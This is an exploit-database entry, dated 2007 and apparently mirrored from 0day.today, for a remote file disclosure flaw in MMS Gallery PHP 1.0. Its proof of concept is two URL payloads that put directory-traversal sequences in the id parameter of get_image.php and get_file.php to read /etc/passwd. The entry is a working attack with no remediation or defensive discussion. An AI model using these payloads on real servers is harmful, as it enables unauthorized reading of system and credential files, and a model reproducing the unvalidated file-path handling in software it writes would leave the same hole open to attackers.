id: 2361
date: 12/13/2007
title: MMS Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

=============================================================
MMS Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability
=============================================================



MMS Gallery in PHP v1.0 (id) Remote File Disclosure Vulnerability
D.Script : http://www.mms2web.com/mms_gallery_php.zip
POC :
      /mms_template/get_image.php?id=../../../../../../../../etc/passwd
      /mms_template/get_file.php?id=../../../../../../../../etc/passwd



#  0day.today [2023-03-24]  #